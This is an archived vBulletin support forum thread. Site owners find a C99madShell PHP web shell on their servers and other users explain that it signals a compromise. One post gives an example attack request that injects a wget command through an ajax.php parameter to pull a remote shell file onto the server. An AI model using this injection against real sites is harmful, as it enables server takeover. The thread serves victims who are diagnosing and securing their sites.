The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
C99madShell v. 2.0 madnet edition
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....
--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] --------------- Ok... it was going back to the init.php file, and told me this line ($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false; I commented that line out (//) and it went away.... --------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] --------------- solved.... error.php |
#2
|
||||
|
||||
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
|
#3
|
|||
|
|||
No, by SOLVED I meant I removed the script.. (The shell script)
|
#4
|
||||
|
||||
That still does not solve how the attacker got the file there. Unless you know that already too?
|
#5
|
|||
|
|||
am having this problem as well.....When I try to edit the payments manager I get the above msg
!C99madShell v. 2.0 madnet edition! Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13 |
#6
|
|||
|
|||
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
|
#7
|
|||
|
|||
Um, it's not a Trojan :P
http://www.derekfountain.org/security_c99madshell.php You've encountered the first evidence that your site has been compromised! Cheers! |
#8
|
||||
|
||||
Quote:
|
#9
|
||||
|
||||
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt
Then they process this from here. I would recommend vbulletin upgrading / securing the ajax.php asap |
#10
|
|||
|
|||
Quote:
But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data? |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|